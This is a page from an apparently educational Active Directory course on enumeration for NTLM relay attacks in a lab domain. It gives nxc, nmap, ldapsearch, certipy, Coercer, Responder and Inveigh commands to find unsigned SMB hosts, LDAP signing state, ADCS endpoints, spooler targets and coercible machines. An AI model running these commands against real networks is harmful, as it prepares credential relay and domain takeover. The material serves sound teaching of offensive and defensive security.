Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Relay Attacks

Enumeration

Relay enumeration answers three questions: which targets accept relay, which sources can be coerced, and which post-relay action is worth attempting.

Variables

export DOMAIN=ootw.local
export DC=10.10.10.200
export ATTACKER=10.10.10.100
export USER=student
export PASS='student'

Find SMB signing state

nxc smb 10.10.10.0/24 --gen-relay-list smb-relay-targets.txt

nxc smb 10.10.10.0/24 -u "$USER" -p "$PASS" --gen-relay-list smb-relay-targets.txt

cat smb-relay-targets.txt

Check SMB signing manually

nxc smb 10.10.10.200 -u "$USER" -p "$PASS"
nmap --script smb2-security-mode -p445 10.10.10.0/24

LDAP signing and channel binding indicators

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=ootw,DC=local" "(cn=Directory Service)" ldapServerIntegrity msDS-Other-Settings

GPO paths for LDAP settings

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "DC=ootw,DC=local" "(objectClass=groupPolicyContainer)" displayName gPCFileSysPath

ADCS relay targets

certipy find -u "$USER@$DOMAIN" -p "$PASS" -dc-ip $DC -enabled -stdout
curl -I http://ca.ootw.local/certsrv/
curl -k -I https://ca.ootw.local/certsrv/

MachineAccountQuota

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "DC=ootw,DC=local" "(objectClass=domainDNS)" ms-DS-MachineAccountQuota

Existing RBCD

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "DC=ootw,DC=local" "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" sAMAccountName dNSHostName msDS-AllowedToActOnBehalfOfOtherIdentity

Spooler check

nxc smb 10.10.10.0/24 -u "$USER" -p "$PASS" -M spooler

Coercer scan

coercer scan -d $DOMAIN -u $USER -p "$PASS" --target 10.10.10.200 --listener $ATTACKER

coercer coerce -d $DOMAIN -u $USER -p "$PASS" --target 10.10.10.200 --listener $ATTACKER

Responder analyze mode

sudo responder -I eth0 -A

Windows Inveigh listen-only

.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console 1 -FileOutput Y

What to record

  • Hosts with SMB signing not required.
  • DC LDAP signing and channel binding state.
  • ADCS HTTP enrollment URLs.
  • Templates usable by machine accounts and users.
  • Targets with Print Spooler enabled.
  • Targets that Coercer can trigger.
  • MachineAccountQuota value.
  • Potential post-relay action: SMB exec, LDAP RBCD, LDAP shadow credentials, ADCS cert.